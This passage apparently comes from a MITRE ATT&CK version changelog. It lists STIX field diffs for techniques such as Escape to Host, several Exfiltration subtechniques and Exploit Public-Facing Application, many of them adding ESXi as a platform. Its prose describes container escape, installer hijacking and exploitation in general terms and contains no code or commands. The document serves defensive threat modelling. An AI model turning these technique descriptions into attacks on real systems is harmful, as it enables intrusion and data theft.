There are multiple ways an adversary may escape from a container to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)
Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)
In ESXi environments, an adversary may exploit a vulnerability in order to escape from a virtual machine into the hypervisor.(Citation: Broadcom VMSA-2025-004)
Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers or virtual machines running on the host, or setting up a command and control channel on the host. |
x_mitre_version | 1.5 | 1.6 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Broadcom VMSA-2025-004', 'description': 'Broadcom. (2025, March 6). VMSA-2025-0004: Questions & Answers. Retrieved March 26, 2025.', 'url': 'https://github.com/vmware/vcf-security-and-compliance-guidelines/tree/main/security-advisories/vmsa-2025-0004'} |
x_mitre_platforms | | ESXi |
[T1557.004] Adversary-in-the-Middle: Evil Twin
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-11-11 18:52:53.686000+00:00 | 2025-04-15 19:58:27.842000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1574.005] Hijack Execution Flow: Executable Installer File Permissions Weakness
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['Administrator', 'User', 'SYSTEM'] | |
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-26 19:20:23.030000+00:00 | 2025-04-15 19:58:41.123000+00:00 |
description | Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. | Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. |
x_mitre_version | 1.0 | 1.1 |
[T1480] Execution Guardrails
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Host Forensic Analysis', 'Signature-based Detection', 'Static File Analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-06-07 14:30:23.491000+00:00 | 2025-04-15 19:58:48.316000+00:00 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1048] Exfiltration Over Alternative Protocol
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:57:26.415000+00:00 | 2025-04-15 19:58:54.894000+00:00 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[5] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1048.002] Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 22:44:11.953000+00:00 | 2025-04-15 19:58:50.294000+00:00 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1011.001] Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-08 21:02:15.802000+00:00 | 2025-04-15 19:58:35.466000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1041] Exfiltration Over C2 Channel
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_network_requirements | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-07 17:09:14.040000+00:00 | 2025-04-15 19:58:51.597000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.2 | 2.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1052] Exfiltration Over Physical Medium
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Presence of physical medium or device'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 22:48:29.702000+00:00 | 2025-04-15 19:59:17.041000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1048.001] Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-28 00:43:24.228000+00:00 | 2025-04-15 19:58:43.571000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1048.003] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_network_requirements | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-12 23:39:25.476000+00:00 | 2025-04-15 19:59:24.041000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.1 | 2.2 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1567] Exfiltration Over Web Service
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:57:40.951000+00:00 | 2025-04-15 19:58:25.560000+00:00 |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1567.004] Exfiltration Over Web Service: Exfiltration Over Webhook
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:57:55.928000+00:00 | 2025-04-15 19:58:26.901000+00:00 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1052.001] Exfiltration Over Physical Medium: Exfiltration over USB
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Presence of physical medium or device'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 22:48:29.490000+00:00 | 2025-04-15 19:58:55.347000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-15 19:11:47.547000+00:00 | 2025-04-15 19:59:03.751000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1567.001] Exfiltration Over Web Service: Exfiltration to Code Repository
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-15 19:08:16.882000+00:00 | 2025-04-15 19:58:48.876000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1567.003] Exfiltration Over Web Service: Exfiltration to Text Storage Sites
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-05-04 18:00:33.023000+00:00 | 2025-04-15 19:59:01.716000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1190] Exploit Public-Facing Application
Current version: 2.7
Version changed from: 2.6 → 2.7
New Mitigations:
- M1035: Limit Access to Resource Over Network
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-24 14:33:53.433000+00:00 | 2025-04-15 19:58:25.266000+00:00 |
description | Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) | Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) |
x_mitre_version | 2.6 | 2.7 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Ars Technica VMWare Code Execution Vulnerability 2021', 'description': 'Dan Goodin . (2021, February 25). Code-execution flaw in VMware has a severity rating of 9.8 out of 10. Retrieved April 8, 2025.', 'url': 'https://arstechnica.com/information-technology/2021/02/armed-with-exploits-hackers-on-the-prowl-for-a-critical-vmware-vulnerability/'} |
external_references | | {'source_name': 'Recorded Future ESXiArgs Ransomware 2023', 'description': 'German Hoeffner, Aaron Soehnen and Gianni Perez. (2023, February 7). ESXiArgs Ransomware Targets Publicly-Exposed ESXi OpenSLP Servers. Retrieved March 26, 2025.', 'url': 'https://www.recordedfuture.com/blog/esxiargs-ransomware-targets-vmware-esxi-openslp-servers'} |
x_mitre_platforms | | Network Devices |
x_mitre_platforms | | ESXi |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Network | |
[T1203] Exploitation for Client Execution
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
x_mitre_system_requirements | ['Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:34:23.908000+00:00 | 2025-04-15 19:59:03.090000+00:00 |
x_mitre_version | 1.4 | 1.5 |
[T1211] Exploitation for Defense Evasion
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'System access controls'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-15 11:41:47.274000+00:00 | 2025-04-15 19:59:24.778000+00:00 |
x_mitre_version | 1.4 | 1.5 |
[T1068] Exploitation for Privilege Escalation
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['User'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-07 17:13:54.168000+00:00 | 2025-04-15 19:58:58.811000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.5 | 1.6 |
[T1210] Exploitation of Remote Services
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
x_mitre_system_requirements | ['Unpatched software or otherwise vulnerable target. Depending on the target and goal, the system and exploitable service may need to be remotely accessible from the internal network.'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-02-24 15:06:46.006000+00:00 | 2025-04-15 19:58:53.590000+00:00 |
description | Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. | Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
There are several well-known vulnerabilities that exist in common services such as SMB(Citation: CIS Multiple SMB Vulnerabilities) and RDP(Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL(Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Additionally, there have been a number of vulnerabilities in VMware vCenter installations, which may enable threat actors to move laterally from the compromised vCenter server to virtual machines or even to ESXi hypervisors.(Citation: Broadcom VMSA-2024-0019)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Broadcom VMSA-2024-0019', 'description': 'Broadcom. (2024, September 17). VMSA-2024-0019: Questions & Answers. Retrieved April 8, 2025.', 'url': 'https://github.com/vmware/vcf-security-and-compliance-guidelines/blob/main/security-advisories/vmsa-2024-0019/README.md'} |
external_references | | {'source_name': 'Ars Technica VMWare Code Execution Vulnerability 2021', 'description': 'Dan Goodin . (2021, February 25). Code-execution flaw in VMware has a severity rating of 9.8 out of 10. Retrieved April 8, 2025.', 'url': 'https://arstechnica.com/information-technology/2021/02/armed-with-exploits-hackers-on-the-prowl-for-a-critical-vmware-vulnerability/'} |
x_mitre_platforms | | ESXi |
[T1090.002] Proxy: External Proxy
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:19:08.953000+00:00 | 2025-04-15 19:58:38.556000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1055.011] Process Injection: Extra Window Memory Injection
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-11-10 18:29:31.004000+00:00 | 2025-04-15 19:58:00.917000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1008] Fallback Channels
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-07-14 19:49:47.340000+00:00 | 2025-04-15 19:59:20.736000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1568.001] Dynamic Resolution: Fast Flux DNS
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-27 16:10:37.183000+00:00 | 2025-04-15 19:58:16.171000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1070.004] Indicator Removal: File Deletion
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Host forensic analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:33:59.107000+00:00 | 2025-04-15 19:59:12.733000+00:00 |
description | Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows and rm or unlink on Linux and macOS. | Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows, rm or unlink on Linux and macOS, and `rm` on ESXi. |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1071.002] Application Layer Protocol: File Transfer Protocols
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-18 17:23:22.591000+00:00 | 2025-04-15 19:58:52.946000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1083] File and Directory Discovery
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:40:10.978000+00:00 | 2025-04-15 19:58:44.118000+00:00 |
x_mitre_version | 1.6 | 1.7 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1222] File and Directory Permissions Modification
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['File system access controls'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-19 17:54:06.038000+00:00 | 2025-04-16 20:37:17.378000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.2 | 2.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1495] Firmware Corruption
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-08-31 17:30:05.440000+00:00 | 2025-04-16 20:37:22.991000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[3] | Network | Network Devices |
[T1553.001] Subvert Trust Controls: Gatekeeper Bypass
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-21 19:30:58.414000+00:00 | 2025-04-16 20:37:16.087000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1558.001] Steal or Forge Kerberos Tickets: Golden Ticket
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-11-05 16:07:03.779000+00:00 | 2025-04-15 19:58:42.362000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1484.001] Domain or Tenant Policy Modification: Group Policy Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-23 22:11:01.884000+00:00 | 2025-04-15 19:58:34.774000+00:00 |
external_references[1]['description'] | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019. | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf | https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf |
x_mitre_version | 1.0 | 1.1 |
[T1027.006] Obfuscated Files or Information: HTML Smuggling
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Web Content Filters', 'Static File Analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 19:12:13.006000+00:00 | 2025-04-15 19:59:12.085000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1200] Hardware Additions
Current version: 1.7
Version changed from: 1.6 → 1.7
Description (old, v1.6):
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
